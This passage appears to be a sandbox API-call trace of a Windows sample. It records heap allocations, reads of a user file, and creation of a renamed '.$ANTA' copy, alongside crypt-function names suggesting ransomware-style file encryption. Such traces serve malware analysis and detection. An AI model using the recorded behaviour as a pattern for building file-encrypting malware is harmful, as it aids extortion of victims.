[0101.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0101.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0101.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0101.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0101.436] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\GPtGPTImgDjIi0576udd.swf.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\gptgptimgdjii0576udd.swf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0101.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0101.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0101.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0101.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0101.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0101.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0101.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0101.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0101.437] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0101.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0101.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0101.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0101.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0101.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0101.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0101.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0101.437] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0101.437] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0101.437] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0101.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0101.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0101.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0101.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0101.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0101.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0101.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0101.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0101.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0101.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0101.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0101.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0101.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0101.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e00020 [0101.441] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0101.441] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x8e18, lpOverlapped=0x0) returned 1 [0101.442] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0101.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0101.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0101.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0101.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0101.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8e18) returned 0x4516010 [0101.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e00020 | out: hHeap=0x1780000) returned 1 [0101.445] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0101.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0101.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0101.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0101.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0101.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8e18) returned 0x451ee30 [0101.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0101.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.446] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0101.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0101.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0101.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0101.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0101.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8e18) returned 0x4516010 [0101.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0101.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0101.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0101.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0101.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0101.447] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0101.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0101.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0101.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0101.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0101.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0101.447] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0101.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0101.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0101.447] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0101.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0101.447] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0101.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0101.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a10 [0101.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8e18) returned 0x4516010 [0101.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a80 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0101.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2aa0 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0101.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ae0 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0101.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0101.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8e18) returned 0x4527c50 [0101.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0101.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0101.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0101.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0101.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0101.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0101.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0101.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0101.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0101.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0101.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0101.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0101.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0101.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0101.449] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0101.450] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0101.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0101.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0101.450] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0101.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0101.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0101.450] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0101.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0101.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ab0 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0101.450] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0101.450] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0101.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0101.451] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0101.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0101.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0101.451] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0101.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0101.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0101.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0101.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0101.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0101.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0101.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0101.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0101.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0101.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0101.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0101.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0101.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0101.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0101.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0101.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0101.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0101.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0101.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0101.452] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0101.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0101.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0101.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0101.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0101.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0101.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0101.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0101.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0101.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0101.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0101.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0101.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0101.453] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0101.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0101.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0101.453] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0101.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0101.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0101.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0101.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0101.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0101.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0101.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0101.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0101.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0101.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 